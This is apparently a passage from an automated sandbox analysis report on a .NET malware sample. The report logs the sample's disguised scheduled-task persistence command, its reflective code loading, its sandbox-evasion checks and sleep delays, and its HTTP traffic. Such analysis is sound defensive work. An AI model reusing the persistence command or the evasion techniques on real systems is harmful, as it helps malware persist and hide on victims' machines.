            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: EGSh5caf8a.exe | Static PE information: certificate valid
            Source: EGSh5caf8a.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: EGSh5caf8a.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: EGSh5caf8a.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            Source: EGSh5caf8a.exe, 0.cs | .Net Code: SQL_PROCESS System.Reflection.Assembly.Load(byte[])
            Source: Accounts_Ledger_Software.eXE.0.dr, 0.cs | .Net Code: SQL_PROCESS System.Reflection.Assembly.Load(byte[])
            Source: 0.2.EGSh5caf8a.exe.38f6b90.1.raw.unpack, 0.cs | .Net Code: SQL_PROCESS System.Reflection.Assembly.Load(byte[])
            Source: EGSh5caf8a.exe | Static PE information: 0xBC79720B [Sat Mar 15 02:20:59 2070 UTC]
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Code function: 0_2_02794F54 pushad ; retf 0_2_02794F55
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | File created: C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE

            Boot Survival

            Source: Yara match | File source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST

            Hooking and other Techniques for Hiding and Protection

            Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 20991
            Source: unknown | Network traffic detected: HTTP traffic on port 20991 -> 49708
            Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 20991
            Source: unknown | Network traffic detected: HTTP traffic on port 20991 -> 49709
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match | File source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
            Source: Yara match | File source: 0.2.EGSh5caf8a.exe.28dc200.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.EGSh5caf8a.exe.28dc200.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: EGSh5caf8a.exe PID: 180, type: MEMORYSTR
            Source: EGSh5caf8a.exe, 00000000.00000002.1314795117.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, EGSh5caf8a.exe, 00000000.00000002.1314795117.00000000028DA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Memory allocated: E00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Memory allocated: 2890000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Memory allocated: E00000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Thread delayed: delay time: 597345
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Window / User API: threadDelayed 2647
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe | Window / User API: threadDelayed 3812
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 6664 | Thread sleep time: -1100000s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -20291418481080494s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -200000s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99844s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7220 | Thread sleep count: 2647 > 30
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99729s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99609s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99500s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99386s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7260 | Thread sleep count: 3812 > 30
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99278s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99890s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99780s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99672s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99562s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99453s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99344s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99234s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99122s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -99015s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -98906s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -98797s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196 | Thread sleep time: -98688s >= -30000s
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98574s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -98030s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -97484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7196Thread sleep time: -597345s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 7244Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exe TID: 4044Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 50000Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99844Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99729Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99609Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99500Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99386Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99278Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99890Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99780Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99672Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99562Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99453Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99344Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99234Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99122Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 99015Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98906Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98797Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98688Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98574Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98469Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98359Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98250Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98141Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 98030Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97922Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97813Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97703Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97594Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 97484Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 597345Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeThread delayed: delay time: 922337203685477Jump to behavior
